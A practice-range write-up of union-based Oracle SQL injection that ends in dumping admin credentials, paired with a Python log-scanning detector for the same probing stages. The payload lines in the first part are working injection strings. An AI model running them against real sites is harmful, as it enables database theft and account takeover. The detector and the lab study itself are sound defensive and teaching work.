First, identify the injection point.
Here we test with `and 1=1` and `and 1=2`.
Once the injection point is confirmed, we determine the number of columns:
id=1 order by 2
id=1 order by 3 (with 3 columns the page display breaks, which shows there are only two columns)
Next we determine which positions are echoed back on the page:
id=-1 union select 'null','null' from dual
After that, we use the following statement to read the database version:
id=-1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual
Query the database (instance) name:
id=-1 union select 'null',(select instance_name from V$INSTANCE) from dual
Query the table names; when enumerating tables one usually looks for an admin or user table:
id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual
id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual
Query the column names:
id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1) from dual
Query the username and password data:
id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1
id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'
id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME <> 'hu'
Once we have the password hash, we reverse the MD5 and can then log in to the admin back-end.
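Added here as a detection-side companion to the walkthrough above (this is not code from the original post): it parses constructed web-server access-log lines and labels each request with the probing stage it corresponds to, so a defender can spot one client escalating from boolean checks through column counting and Oracle catalog enumeration to data extraction. The log format, the `/news.php` path and the stage names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines (not taken from the original post); the
# query strings reproduce the probing sequence the walkthrough above describes.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Aug/2024:10:01:02 +0000] "GET /news.php?id=1 HTTP/1.1" 200 5120
10.0.0.5 - - [20/Aug/2024:10:01:09 +0000] "GET /news.php?id=1%20and%201=2 HTTP/1.1" 200 4800
10.0.0.5 - - [20/Aug/2024:10:01:15 +0000] "GET /news.php?id=1%20order%20by%203 HTTP/1.1" 500 312
10.0.0.5 - - [20/Aug/2024:10:01:21 +0000] "GET /news.php?id=-1%20union%20select%20'null',(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual HTTP/1.1" 200 5200
10.0.0.5 - - [20/Aug/2024:10:01:30 +0000] "GET /news.php?id=-1%20union%20select%20USER_NAME,USER_PWD%20from%20%22sns_users%22%20where%20rownum=1 HTTP/1.1" 200 5300
"""

# Most specific first: an Oracle catalog/view reference outranks the generic
# "union select ... from dual" echo probe, which outranks any other union.
STAGES = [
    ("column_enum",   re.compile(r"\buser_tab_columns\b", re.I)),
    ("table_enum",    re.compile(r"\buser_tables\b", re.I)),
    ("instance_enum", re.compile(r"\bv\$instance\b", re.I)),
    ("version_enum",  re.compile(r"\bv_?\$version\b", re.I)),
    ("union_echo",    re.compile(r"\bunion\s+select\b.*\bfrom\s+dual\b", re.I)),
    ("data_extract",  re.compile(r"\bunion\s+select\b", re.I)),
    ("column_count",  re.compile(r"\border\s+by\s+\d+", re.I)),
    ("boolean_probe", re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')

def classify_query(query: str):
    """Return the probing stage a raw (URL-encoded) query string matches, else None."""
    decoded = unquote_plus(query)
    for stage, pattern in STAGES:
        if pattern.search(decoded):
            return stage
    return None

def scan_log(text: str) -> list:
    """Parse access-log lines and report every request that matches a stage."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a request line we understand
        ip, _method, target, status = m.groups()
        query = target.partition("?")[2]  # everything after '?' (may be empty)
        stage = classify_query(query)
        if stage:
            findings.append({"ip": ip, "stage": stage, "status": int(status),
                             "query": unquote_plus(query)})
    return findings
```

A single client producing the ordered sequence boolean_probe, column_count, version_enum, data_extract within seconds is the signature worth alerting on, whatever individual status codes the requests returned.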
Tags: union, rownum, USER, Oracle, practice range, null, id, select, Mozhe. From: https://blog.csdn.net/Nai_zui_jiang/article/details/141354739